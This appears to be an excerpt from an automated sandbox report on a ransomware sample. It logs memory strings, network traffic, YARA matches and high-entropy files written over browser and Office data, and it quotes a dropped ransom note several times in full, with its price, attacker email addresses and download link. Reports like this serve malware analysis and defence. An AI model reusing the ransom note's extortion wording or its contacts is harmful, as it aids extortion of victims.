          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.0000000000545000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49731 version: TLS 1.2
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dPrice of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0874PsawqStp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyTJump to dropped file
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1424, type: MEMORYSTR
          Source: Yara matchFile source: 33.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.66d5df681876c_file010924.exe.23215a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.66d5df681876c_file010924.exe.23915a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.66d5df681876c_file010924.exe.23915a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.66d5df681876c_file010924.exe.23215a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.66d5df681876c_file010924.exe.23815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.66d5df681876c_file010924.exe.23815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.1624809590.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6476, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 4244, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1424, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 66d5df681876c_file010924.exe PID: 7864, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile moved: C:\Users\user\Desktop\LFOPODGVOH.mp3Jump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile deleted: C:\Users\user\Desktop\LFOPODGVOH.mp3Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile moved: C:\Users\user\Desktop\UNKRLCVOHV.pngJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile deleted: C:\Users\user\Desktop\UNKRLCVOHV.pngJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile moved: C:\Users\user\Desktop\LFOPODGVOH.pdfJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7cJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{2ce60361-e872-41fb-bae7-eec2f580d4fb}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile dropped: C:\Users\jones\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\0.0.filtertrie.intermediate.txt entropy: 7.99541629417Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99734477506Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\Apps.ft entropy: 7.99696784612Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{70bdcd3f-91d1-45d6-848a-0c765c55504f}\0.0.filtertrie.intermediate.txt entropy: 7.99619580346Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{70bdcd3f-91d1-45d6-848a-0c765c55504f}\Apps.ft entropy: 7.99638538504Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json entropy: 7.99518799871Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm entropy: 7.99375107353Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite entropy: 7.99806344344Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f78182d0-da37-4a03-8fe1-b917f4ad5bb8}\0.0.filtertrie.intermediate.txt entropy: 7.99513447547Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f78182d0-da37-4a03-8fe1-b917f4ad5bb8}\Apps.ft entropy: 7.99689654847Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm entropy: 7.99471971553Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite entropy: 7.99736990992Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm entropy: 7.99498296249Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite entropy: 7.99807253666Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingsglobals.txt entropy: 7.9952403365Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingssynonyms.txt entropy: 7.99826459819Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm entropy: 7.99416097866Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite entropy: 7.99813187876Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99865877063Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db entropy: 7.99564064923Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico entropy: 7.99753409561Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99768564873Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99505226627Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.9936592669Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99050960649Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99754247681Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99642334442Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99275977369Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99276670871Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99222281284Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.9925754731Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml entropy: 7.99191674896Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml entropy: 7.99458045252Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99435233482Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.99334846214Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001a.db entropy: 7.99820906494Jump to dropped file
